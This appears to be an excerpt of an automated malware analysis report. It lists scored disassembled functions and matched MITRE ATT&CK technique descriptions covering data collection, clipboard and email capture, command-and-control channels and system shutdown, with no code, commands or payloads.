Function 00E23A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00E23778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 00E2F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 01912780 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre